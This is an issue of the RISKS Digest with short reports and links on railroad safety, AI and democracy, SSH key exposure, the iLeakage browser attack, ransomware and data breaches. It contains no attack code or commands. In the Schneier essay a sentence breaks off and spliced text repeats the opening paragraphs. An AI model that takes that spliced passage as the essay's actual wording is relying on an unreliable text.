The RISKS Digest
Volume 33 Issue 94

Saturday, 18th November 2023

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…

Contents

How the Railroad Industry Intimidates Employees Into Putting Speed Before Safety
ProPublica
Hikers Rescued After Following Nonexistent Trail on Google Maps
NTimes
Admission of the state of software
David Lamkin
500 chatbots read the news and discussed it on social media. Guess how that went.
Business Insider
The Problem with Regulating AI
Tim Wu
ChatGPT Created a Fake Dataset With Skewed Results
MedPage Today
Researchers Discover New Vulnerability in Large Language Models
Carnegie Mellon University
Ten ways AI will change democracy
Bruce Schneier
Fake Reviews Are Rampant Online. Can a Crackdown End Them?
NYTimes
OpenAI co-founder & president Greg Brockmane quits after firing of CEO Altman
TechCrunch
The AI Pin
Rob Slade
Ukraine's ‘Secret Weapon’ Against Russia Is a U.S. Tech Company
Vera Bergengruen
Cryptographic Keys Protecting SSH Connections Exposed
Dan Goodin
Developers can't seem to stop exposing credentials in publicly accessible code
Ars Technica
Hacking Some More Secure USB Flash Drives—Part II
SySS Tech Blog
Social media gets teens hooked while feeding aggression and impulsivity, and researchers think they know why
CBC
X marks the non-spot?
PGN adapted from Lauren Weinstein
It's Still Easy for Anyone to Become You at Experian
Krebs on Security
Paying ransom for data stolen in cyberattack bankrolls further crime, experts caution
CBC
Toronto Public Library cyber-attack
Mark Brader
People selling cars via Internet get phished
CBC
Data breach of Michigan healthcare giant exposes millions of records
Engadget
More on iLeakage
Victor Miller
Using your iPhone to start your car is about to get a lot easier
The Verge
Massive cryptomining rig discovered under Polish court's floor, stealing power
Ars Technica
A Coder Considers the Waning Days of the Craft
The New Yorker via Steve Bacher
Re: Industrial Robot Crushes Worker to Death
PGN
Re: Toyota has built an EV with a fake transmission
Peter Houppermans
Re: Data on 267,000 Sarnia patients going back 3 decades among cyberattack thefts at 5 Ontario hospitals Digest
Mark Brader
Info on RISKS (comp.risks)

How the Railroad Industry Intimidates Employees Into Putting Speed Before Safety (ProPublica)

Gabe Goldberg <gabe@gabegold.com>
Wed, 15 Nov 2023 23:43:11 -0500

Railroad companies have penalized workers for taking the time to make needed repairs and created a culture in which supervisors threaten and fire the very people hired to keep trains running safely. Regulators say they can’t stop this intimidation.

Bradley Haynes and his colleagues were the last chance Union Pacific had to stop an unsafe train from leaving one of its railyards. Skilled in spotting hidden dangers, the inspectors in Kansas City, Missouri, wrote up so-called “bad orders” to pull defective cars out of assembled trains and send them for repairs.

But on Sept. 18, 2019, the area’s director of maintenance, Andrew Letcher, scolded them for hampering the yard’s ability to move trains on time.

“We're a transportation company, right? We get paid to move freight. We don't get paid to work on cars,” he said.

https://www.propublica.org/article/railroad-safety-union-pacific-csx-bnsf-trains-freight


Hikers Rescued After Following Nonexistent Trail on Google Maps (

Jan Wolitzky <jan.wolitzky@gmail.com>
Sun, 12 Nov 2023 17:04:52 -0500

A Canadian search-and-rescue group said it had conducted two missions recently after hikers may have sought to follow a nonexistent trail on Google Maps

A search-and-rescue group in British Columbia advised hikers to use a paper map and compass instead of street map programs after it said two hikers had been rescued by helicopter after likely following a trail that did not exist but that appeared on Google Maps.

The group, North Shore Rescue, said on Facebook that on 6 Nov 2023 Google Maps had removed the nonexistent trail, which was in a very steep area with cliffs north of Mount Fromme, which overlooks Vancouver.

https://www.nytimes.com/2023/11/12/world/canada/google-maps-trail-british-columbia.html


Admission of the state of software

David Lamkin <drl@shelford.org>
Thu, 16 Nov 2023 09:51:56 +0000

Having put of buying a ‘smart car’ for as long as possible I am now the proud (?) owner of a SEAT Arona. The instruction manual is long and detailed but one statement does not inspire confidence:

> As with most state-of-the-art computer and electronic equipment, in
> certain cases the system may need to be rebooted to make sure that it
> operates correctly.

This statement should shame all software engineers!


500 chatbots read the news and discussed it on social media. Guess how that went. (Business Insider)

Dave Farber <farber@gmail.com>
Thu, 16 Nov 2023 00:29:03 +0900

https://www.businessinsider.com/ai-chatbots-less-toxic-social-networks-twitter-simulation-2023-11


The Problem with Regulating AI (Tim Wu)

Peter Neumann <neumann@csl.sri.com>
Sun, 12 Nov 2023 16:09:15 PST

Tim Wu, The New York Times, 12 Nov 2023

If the government acts prematurely on this evolving technology, it could fail to prevent concrete harm.

Final para: The existence of actual social harm has long been a touchstone of legitimate state action. But that point cuts both ways: The state should proceed cautiously in the absence of harm, but it also has duty, given evidence of harm, to take action. By that measure, with AI we are at risk of doing too much and too little at the same time.

ChatGPT Created a Fake Dataset With Skewed Results (MedPage Today)

Victor Miller <victorsmiller@gmail.com>
Mon, 13 Nov 2023 20:59:13 +0000

https://www.medpagetoday.com/special-reports/features/107247


Researchers Discover New Vulnerability in Large Language Models (Carnegie Mellon University)

Victor Miller <victorsmiller@gmail.com>
Tue, 14 Nov 2023 16:21:02 +0000

https://www.cmu.edu/news/stories/archives/2023/july/researchers-discover-new-vulnerability-in-large-language-models


Ten ways AI will change democracy

Bruce Schneier <schneier@schneier.com>
Wed, 15 Nov 2023 08:48:25 +0000
A free monthly newsletter providing summaries, analyses, and commentaries on security: computer and otherwise.
** TEN WAYS AI WILL CHANGE DEMOCRACY

[2023.11.13] [https://www.schneier.com/blog/archives/2023/11/ten-ways-ai-will-change-democrac y.html] Artificial intelligence will change so many aspects of society, largely in ways that we cannot conceive of yet. Democracy, and the systems of governance that surround it, will be no exception. In this short essay, I want to move beyond the AI-generated disinformation trope and speculate on some of the ways AI will change how democracy functions—in both large and small ways.

When I survey how artificial intelligence might upend different aspects of modern society, democracy included, I look at four different dimensions of change: speed, scale, scope, and sophistication. Look for places where changes in degree result in changes of kind. Those are where the societal upheavals will happen.

Some items on my list are still speculative, but none require science-fictional levels of technological advance. And we can see the first stages of many of them today. When reading about the successes and failures of AI systems, it's important to differentiate between the fundamental limitations of AI as a technology, and the practical limitations of AI systems in the fall of 2023. Advances are happening quickly, and the impossible is becoming the routine. We don't know how long this will continue, but my bet is on continued major technological advances in the coming years. Which means it's going to be a wild ride.

So, here's my list:

1. AI as educator. We are already seeing AI serving the role of teacher. It's much more effective for a student to learn a topic from an interactive AI chatbot than from a textbook. This has applications for democracy. We can imagine chatbots teaching citizens about different issues, such as climate change or tax policy. We can imagine candidates modern society, democracy included, I look at four different dimensions of change: speed, scale, scope, and sophistication. Look for places where changes in degree result in changes of kind. Those are where the societal upheavals will happen.

Some items on my list are still speculative, but none require science-fictional levels of technological advance. And we can see the first stages of many of them today. When reading about the successes and failures of AI systems, it's important to differentiate between the fundamental limitations of AI as a technology, and the practical limitations of AI systems in the fall of 2023. Advances are happening quickly, and the impossible is becoming the routine. We don't know how long this will continue, but my bet is on continued major technological advances in the coming years. Which means it's going to be a wild ride.

So, here's my list:

  1. AI as educator. We are already seeing AI serving the role of teacher. It's much more effective for a student to learn a topic from an interactive AI chatbot than from a textbook. This has applications for democracy. We can imagine chatbots teaching citizens about different issues, such as climate change or tax policy. We can imagine candidates [https://www.theatlantic.com/technology/archive/2023/04/ai-generated-political-ads-election-candidate-voter-interaction-transparency/673893/] of themselves, allowing voters to directly engage with them on various issues. A more general chatbot could know the positions of all the candidates, and help voters decide which best represents their position. There are a lot of possibilities here.
  2. AI as sense maker. There are many areas of society where accurate summarization is important. Today, when constituents write to their legislator, those letters get put into two piles—one for and another against—and someone compares the height of those piles. AI can do much better. It can provide a rich summary [https://theconversation.com/ai-could-shore-up-democracy-heres-one-way-207278] of the comments. It can help figure out which are unique and which are form letters. It can highlight unique perspectives. This same system can also work for comments to different government agencies on rulemaking processes—and on documents generated during the discovery process in lawsuits.
  3. AI as moderator, mediator, and consensus builder. Imagine online conversations in which AIs serve the role of moderator. This could ensure that all voices are heard. It could block hateful—or even just off-topic—comments. It could highlight areas of agreement and disagreement. It could help the group reach a decision. This is nothing that a human moderator can't do, but there aren't enough human moderators to go around. AI can give this capability [https://slate.com/technology/2023/04/ai-public-option.html] to every decision-making group. At the extreme, an AI could be an arbiter—a judge—weighing evidence and making a decision. These capabilities don't exist yet, but they are not far off.
  4. AI as lawmaker. We have already seen proposed legislation written [https://lieu.house.gov/media-center/press-releases/rep-lieu-introduces-first-federal-legislation-ever-written-artificial] by AI [https://www.politico.com/newsletters/digital-future-daily/2023/07/19/why-chatgpt-wrote-a-bill-for-itself-00107174], albeit more as a stunt than anything else. But in the future AIs will help craft legislation, dealing with the complex ways laws interact with each other. More importantly, AIs will eventually be able to craft loopholes [https://www.technologyreview.com/2023/03/14/1069717/how-ai-could-write-our-laws/] in legislation, ones potentially too complicated for people to easily notice. On the other side of that, AIs could be used to find loopholes in legislation—for both existing and pending laws. And more generally, AIs could be used to help develop policy positions.
  5. AI as political strategist. Right now, you can ask your favorite chatbot questions about political strategy: what legislation would further your political goals, what positions to publicly take, what campaign slogans to use. The answers you get won't be very good, but that'll improve with time. In the future we should expect politicians to make use of this AI expertise: not to follow blindly, but as another source of ideas. And as AIs become more capable at using tools [https://www.wired.com/story/does-chatgpt-make-you-nervous-try-chatgpt-with-a-hammer/], they can automatically conduct polls and focus groups to test out political ideas. There are a lot of possibilities [https://www.technologyreview.com/2023/07/28/1076756/six-ways-that-ai-could-change-politics/] here: AIs could also engage in fundraising campaigns, directly soliciting contributions from people.
  6. AI as lawyer. We don't yet know which aspects of the legal profession can be done by AIs, but many routine tasks that are now handled by attorneys will soon be able to be completed by an AI. Early attempts at having AIs write legal briefs haven't worked [https://www.reuters.com/legal/new-york-lawyers-sanctioned-using-fake-chatgpt-cases-legal-brief-2023-06-22/], but this will change as the systems get better at accuracy. Additionally, AIs can help people navigate government systems: filling out forms, applying for services, contesting bureaucratic actions. And future AIs will be much better at writing legalese, reducing the cost of legal counsel.
  7. AI as cheap reasoning generator. More generally, AI chatbots are really good at generating persuasive arguments. Today, writing out a persuasive argument takes time and effort, and our systems reflect that. We can easily imagine AIs conducting lobbying campaigns [https://www.nytimes.com/2023/01/15/opinion/ai-chatgpt-lobbying-democracy.html], generating and submitting comments [https://www.belfercenter.org/publication/we-dont-need-reinvent-our-democracy-save-it-ai] on legislation and rulemaking. This also has applications for the legal system. For example: if it is suddenly easy to file thousands of court cases, this will overwhelm the courts. Solutions for this are hard. We could increase the cost of filing a court case, but that becomes a burden on the poor. The only solution might be another AI working for the court, dealing with the deluge of AI-filed cases—which doesn't sound like a great idea.
  8. AI as law enforcer. Automated systems already act as law enforcement in some areas: speed trap cameras are an obvious example. AI can take this kind of thing much further, automatically identifying people who cheat on tax returns or when applying for government services. This has the obvious problem of false positives, which could be hard to contest if the courts believe that the computer is always right. Separately, future laws might be so complicated [https://slate.com/technology/2023/07/artificial-intelligence-microdirectives.html] that only AIs are able to decide whether or not they are being broken. And, like breathalyzers, defendants might not be allowed to know how they work.
  9. AI as propagandist. AIs can produce and distribute propaganda faster than humans can. This is an obvious risk, but we don't know how effective any of it will be. It makes disinformation campaigns easier, which means that more people will take advantage of them. But people will be more inured against the risks. More importantly, AI's ability to summarize and understand text can enable much more effective censorship.
  10. AI as political proxy. Finally, we can imagine an AI voting on behalf of individuals. A voter could feed an AI their social, economic, and political preferences; or it can infer them by listening to them talk and watching their actions. And then it could be empowered to vote on their behalf, either for others who would represent them, or directly on ballot initiatives. On the one hand, this would greatly increase voter participation. On the other hand, it would further disengage people from the act of understanding politics and engaging in democracy.

When I teach AI policy at HKS, I stress the importance of separating the specific AI chatbot technologies in November of 2023 with AI's technological possibilities in general. Some of the items on my list will soon be possible; others will remain fiction for many years. Similarly, our acceptance of these technologies will change. Items on that list that we would never accept today might feel routine in a few years. A judgeless courtroom seems crazy today, but so did a driverless car a few years ago. Don't underestimate our ability to normalize new technologies. My bet is that we're in for a wild ride.

This essay previously appeared on the Harvard Kennedy School Ash Center's website: https://ash.harvard.edu/ten-ways-ai-will-change-democracy


Fake Reviews Are Rampant Online. Can a Crackdown End Them? (NYTimes)

Monty Solomon <monty@roscom.com>
Mon, 13 Nov 2023 17:37:27 -0500

A wave of regulation and industry action has placed the flourishing fake review business on notice. But experts say the problem may be insurmountable.

https://www.nytimes.com/2023/11/13/technology/fake-reviews-crackdown.html


OpenAI co-founder & president Greg Brockmane quits after firing of CEO Altman (TechCrunch)

Lauren Weinstein <lauren@vortex.com>
Fri, 17 Nov 2023 16:29:37 -0800

https://techcrunch.com/2023/11/17/greg-brockman-quits-openai-after-abrupt-firing-of-sam-altman/


The AI Pin

Rob Slade <rslade@gmail.com>
Fri, 17 Nov 2023 09:45:44 -0800

The name is obviously intended to capitalize on the recent interest in generative/large language model artificial intelligence. Equally obviously, some AI is involved, as long as you allow your definition of AI to extend to mere speech-to-text capability.

Humane's AI Pin is a smartphone. With no screen. Attaching to your clothing with a magnet, it can make calls, take pictures, access the Internet, and even at need, project text (presumably later it will do images) onto surfaces using lasers.

In one sense, this is what I always figured that smartphones would become. It is styled as a “smart assistant.” If you have a human assistant, you give them orders verbally, you don't type out commands. (Unless you're sending them texts …)


Ukraine's ‘Secret Weapon’ Against Russia Is a U.S. Tech Company (Vera Bergengruen)

ACM TechNews <technews-editor@acm.org>
Fri, 17 Nov 2023 10:55:40 -0500 (EST)

Vera Bergengruen, Time, 14 Nov 2023

U.S. facial recognition company Clearview AI has become Ukraine's “secret weapon” in its war against Russia. More than 1,500 officials across 18 Ukrainian government agencies are using its technology, which has helped them identify more than 230,000 Russian soldiers and officials who have participated in the Russian invasion. Ukraine also relies on the company to assist with other tasks, including processing citizens who lost their identification and locating abducted Ukrainian children. Ukraine has run at least 350,000 searches of Clearview's database in the 20 months since the outbreak of the war. Said Clearview AI CEO Hoan Ton-That, “Using facial recognition in war zones is something that's going to save lives.”


Cryptographic Keys Protecting SSH Connections Exposed (Dan Goodin)

ACM TechNews <technews-editor@acm.org>
Wed, 15 Nov 2023 11:57:51 -0500 (EST)

Dan Goodin, Ars Technica, 13 Nov 2023, via ACM Tech News

Researchers at the University of California, San Diego (UCSD) demonstrated that a large portion of cryptographic keys used to protect data in computer-to-server SSH traffic is vulnerable, and were able to calculate the private portion of almost 200 unique SSH keys they observed in public Internet scans. The vulnerability occurs when there are errors during the signature generation that takes place when a client and server are establishing a connection. It affects only keys using the RSA cryptographic algorithm, which the researchers found in roughly a third of the SSH signatures they examined, translating to about 1 billion signatures, about one in a million of which exposed the private key of the host. Said UCSD's Keegan Ryan, “Our research reiterates the importance of defense in depth in cryptographic implementations and illustrates the need for protocol designs that are more robust against computational errors.”


Developers can't seem to stop exposing credentials in publicly accessible code (Ars Technica)

Victor Miller <victorsmiller@gmail.com>
Thu, 16 Nov 2023 14:15:59 +0000

https://arstechnica.com/security/2023/11/developers-cant-seem-to-stop-exposing-credentials-in-publicly-accessible-code/


Hacking Some More Secure USB Flash Drives—Part II (SySS Tech Blog)

Victor Miller <victorsmiller@gmail.com>
Mon, 13 Nov 2023 02:06:07 +0000

https://blog.syss.com/posts/hacking-usb-flash-drives-part-2/


Social media gets teens hooked while feeding aggression and impulsivity, and researchers think they know why (CBC)

Matthew Kruk <mkrukg@gmail.com>
Thu, 16 Nov 2023 05:49:16 -0700

https://www.cbc.ca/news/health/smartphone-brain-nov14-1.7029406

Kids who spend hours on their phones scrolling through social media are showing more aggression, depression and anxiety, say Canadian researchers.

Emma Duerden holds the Canada Research Chair in neuroscience and learning disorders at Western University, where she uses brain imaging to study the impact of social media use on children's brains.

She and others found that screen time has fallen just slightly from the record 13 hours a day some Canadian parents reported for six- to 12-year-olds in the early months of the COVID-19 pandemic.

“We're seeing lots of these effects. Children are reporting high levels of depression and anxiety or aggression. It really is a thing.”


X marks the non-spot? (PGN adapted)

Lauren Weinstein <lauren@vortex.com>
Fri, 17 Nov 2023 16:37:46 -0800

It's Still Easy for Anyone to Become You at Experian (Krebs on Security)

Steve Bacher <sebmb1@verizon.net>
Tue, 14 Nov 2023 14:47:20 +0000 (UTC)

https://krebsonsecurity.com/2023/11/its-still-easy-for-anyone-to-become-you-at-experian/


Paying ransom for data stolen in cyberattack bankrolls further crime, experts caution (CBC)

Matthew Kruk <mkrukg@gmail.com>
Sat, 18 Nov 2023 13:37:55 -0700

https://www.cbc.ca/radio/spark/cyberattacks-ransomware-paying-ransom-crime-1.7030579

When the town of St. Marys, Ont., fell victim to a cyberattack last year, lawyers advised the municipality to pay a ransom of $290,000 in cryptocurrency.

The decision was made after an analysis by firms specializing in cybersecurity. Al Strathdee, mayor of the southwestern Ontario town of about 7,000 residents, said the potential risk to people's data was too high not to pay up.


Toronto Public Library cyber-attack

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 01:53:56 -0500 (EST)

[Note: This was previously reported as ransomware. Now they just say that no ransom has been paid.]

The Toronto Public Library reported a cyber-attack on October 28, and later said that “a large number of files” were stolen, including personal information of library staff. While they're working on the problem, the library's web site is down. (You get forwarded to an information page currently at: https://torontopubliclibrary.typepad.com/tpl_maintenance/toronto-public-library-website-maintenance.html)

The public computers and printers at all 100 library branches are also down. All this means that you (meaning me) can't request a book be held for you, and you also can't search the electric catalog that replaced the old card catalogs.

See also: http://www.cbc.ca/news/any-1.7028982


People selling cars via Internet get phished (CBC)

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 02:00:47 -0500 (EST)

It says here http://www.cbc.ca/news/any-1.7028730 that people who post car-for-sale ads are being sought by scammers. The seller gets what appears to be an offer, but it requests the seller use a specific source to provide the vehicle's history — a source that's actually phishing for credit-card information.


Data breach of Michigan healthcare giant exposes millions of records (Engadget)

Monty Solomon <monty@roscom.com>
Tue, 14 Nov 2023 22:27:15 -0500

https://www.engadget.com/data-breach-of-michigan-healthcare-giant-exposes-millions-of-records-153450209.html


More on iLeakage

Victor Miller <victorsmiller@gmail.com>
Thu, 16 Nov 2023 19:26:39 -0800

[…] We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution. In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.

Virtually all modern CPUs use a performance optimization where they predict if a branch instruction will be taken or not, should the outcome not be readily available. Once a prediction is made, the CPU will execute instructions along the prediction, a process called speculative execution. If the CPU realizes it had mispredicted, it must revert all changes in the state it performed after the prediction. Both desktop and mobile CPUs exhibit this behavior, regardless of manufacturer (such as Apple, AMD, or Intel).

A Spectre attack coerces the CPU into speculatively executing the wrong flow of instructions. If this wrong flow has instructions depending on sensitive data, their value can be inferred through a side channel even after the CPU realizes the mistake and reverts its changes.

We disclosed our results to Apple on September 12, 2022 (408 days before public release).


Using your iPhone to start your car is about to get a lot easier (The Verge)

Monty Solomon <monty@roscom.com>
Thu, 16 Nov 2023 21:12:33 -0500

https://www.theverge.com/2023/11/16/23964379/apple-iphone-digital-key-uwb-ccc-fira-working-group


Massive cryptomining rig discovered under Polish court's floor, stealing power (Ars Technica)

Monty Solomon <monty@roscom.com>
Thu, 16 Nov 2023 22:41:25 -0500

https://arstechnica.com/?p=1984512


A Coder Considers the Waning Days of the Craft (The New Yorker)

Steve Bacher <sebmb1@verizon.net>
Fri, 17 Nov 2023 10:33:36 -0800

www.newyorker.com

James Somers, a professional coder, writes about the astonishing scripting skills of A.I. chatbots like GPT-4 and considers the future of a once exalted craft.

https://www.newyorker.com/magazine/2023/11/20/a-coder-considers-the-waning-days-of-the-craft

I really disagree with some of what the writer says about programming/coding.

“What I learned was that programming is not really about knowledge or skill but simply about patience, or maybe obsession.”

Almost certainly he got that attitude because he started, from no experience, with the worst possible programming language, Visual C++. There's no way anyone should begin learning how to code with any C++ variant. Those of us who started with Basic (or even FORTRAN, in my case) ended up doing better. Not to mention Logo.


Re: Industrial Robot Crushes Worker to Death (R 33 93)

Peter Neumann <neumann@csl.sri.com>
Mon, 13 Nov 2023 10:13:49 PST

CBS News, 09 Nov 2023

An industrial robot crushed a worker to death at a vegetable packaging factory in South Korea's southern county of Goseong. According to police, the victim was grabbed and pressed against a conveyor belt by the machine's robotic arms. The machine was equipped with sensors designed to identify boxes. “It wasn't an advanced, artificial intelligence-powered robot, but a machine that simply picks up boxes and puts them on pallets,” said Kang Jin-gi at Goseong Police Station. According to another police official, security camera footage showed the man had moved near the robot with a box in his hands, which could have triggered the machine's reaction. Similar incidents have happened in South Korea before.


Re: Toyota has built an EV with a fake transmission (RISKS-33.93)

Peter Houppermans <peter@houppermans.net>
Tue, 14 Nov 2023 21:34:36 +0100

It depends on your perspective—there is actually a good use case for it.

You may argue that this will eventually be a thing of the past, but changing gear manually is very prevalent in Europe. I would posit that this may have something to do with the difference in fuel prices as manual cars are (or used to be) more economical to drive, but a side effect is that this also results in driving license exemptions—when you have learned to drive with an automatic you are not allowed to drive a manual car, in some countries for a few years, in some you even have to pass a separate exam.

Learning to drive with a manual car qualifies you for both, and this presently creates a conundrum for driving schools: in order to teach someone to drive with a manual car, they are effectively legally required to use an ICE vehicle as EVs tend to be automatic - until now.

If Toyota's “fake transmission” is realistic enough to mimic ICE behaviour to be ratified as a viable alternative, it could offer an EV stopgap until manual vehicles are rare enough for the demand to disappear.

[From that perspective, it's not a game or gadget, but a useful simulator.]
[Martin Ward responds:
That's an ingenious example that I hadn't thought of! It would make for a pretty expensive learner car. MW]

Re: Data on 267,000 Sarnia patients going back 3 decades among cyberattack thefts at 5 Ontario hospitals Digest (RISKS-33.93)

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 01:38:59 -0500 (EST)

New update: https://www.cbc.ca/news/canada/windsor/anykey-1.7031544

Please report problems with the web pages to the maintainer

x
Top